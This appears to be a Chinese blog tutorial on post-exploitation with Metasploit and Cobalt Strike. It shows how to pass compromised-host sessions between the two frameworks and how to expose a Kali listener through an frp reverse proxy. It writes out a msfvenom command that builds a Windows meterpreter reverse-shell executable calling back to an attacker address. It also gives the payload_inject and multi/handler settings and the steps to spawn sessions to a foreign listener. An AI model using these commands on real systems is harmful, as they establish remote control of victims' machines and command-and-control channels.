去链接看详细介绍:https://www.cnblogs.com/bilei/p/16054191.html

首先在msf下获得一个meterpreter
可以通过msfvenom生成payload

msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=192.168.10.41 LPORT=8888 -f exe > shell.exe

在目标主机执行shell,在攻击机监听对应主机端口即得到一个meterpreter
在这里插入图片描述

1、首先把msf上获取到的meterpreter挂在后台运行

执行命令:background,即可
2、然后使用 exploit/windows/local/payload_inject来注入一个新的payload到session中,具体命令如下
在这里插入图片描述

use exploit/windows/local/payload_inject
set payload windows/meterpreter/reverse_http
set LHOST 192.168.10.200 //cs主机地址
set LPORT 9999 //随意设置监听端口,需要和cs保持一致
set session 14 //设置需要派送的meterpreter
set DisablePayloadHandler true //禁止产生一个新的handler

3、切换到cs中,建立监听
在这里插入图片描述

4、成功上线

再在msf中执行run,此时cs中肉鸡上线
在这里插入图片描述

cs下的会话传给msf

首先在msf上监听自己的ip跟端口:
use exploit/multi/handler
set payload windows/meterpreter/reverse_http(跟cs上选用的payload一样)
set lhost 本机ip
set lport 接受的端口
exploit 执行

这里vps使用虚机centos 192.168.41.7
msf使用虚机kali 192.168.1.6
在这里插入图片描述

然后cs那边创建一个foreign监听的listeners。

Listeners的ip为msf的ip,端口为msf监听的端口(注:如果msf是内网下的,则需要把端口映射到公网,或者使用ngrok等工具做流量转发)

然后,回到cs上,选中拿下的计算机会话,右键选中spawn,然后在弹出来的框中

选择刚刚创建的listeners监听器,然后执行。

此时,msf下即可看到已经拿到了一个新的会话。(需要等一会)

值得注意的是,cs派送给msf的时候尽量选择tcp的payload去派送。

注意:前期利用的payload载荷一定要跟目标系统的系统位数一致,否则后面传递会话的时候会出现问题。
frp映射内网kali

kali内网地址192.168.1.6
vps地址192.168.1.7

说明:这里虽然两者在一网段,不过不影响我们实验!
1、在kali里配置frp

说明:这里local_ip是kali本身地址,也可以127.0.0.1
local_port =1266随便配置一个不常用端口
remote_port =1099 这个是要映射到vps上端口
执行./frpc -c ./frpc.ini

2、在vps里配置frp

默认配置即可,执行./frps -c ./frps.ini
3、在kali里配置msf

前面选择exploit同第一部分,指的注意的是lhost指kali本身,lport是1266即需要转发的转口,千万不能填写配置的vps1099端口
run执行

4、在vps里配置监听模块

说明:在vps里监听他本身,即相当于监听了需要监听的kali地址和端口
5、收到sessions会话

稍等一会,即会在kali里面收到sessions会话

GitHub 加速计划 / fr / frp
83.03 K
13 K
下载
frp 是一个专注于内网穿透的高性能的反向代理应用,支持 TCP、UDP、HTTP、HTTPS 等多种协议,且支持 P2P 通信。可以将内网服务以安全、便捷的方式通过具有公网 IP 节点的中转暴露到公网。
最近提交(Master分支:2 个月前 )
b14192a8 Co-authored-by: Coder123 <coder123@example.com> 14 小时前
2466e65f Resolves: #4466 3 天前
Logo

旨在为数千万中国开发者提供一个无缝且高效的云端环境,以支持学习、使用和贡献开源项目。

更多推荐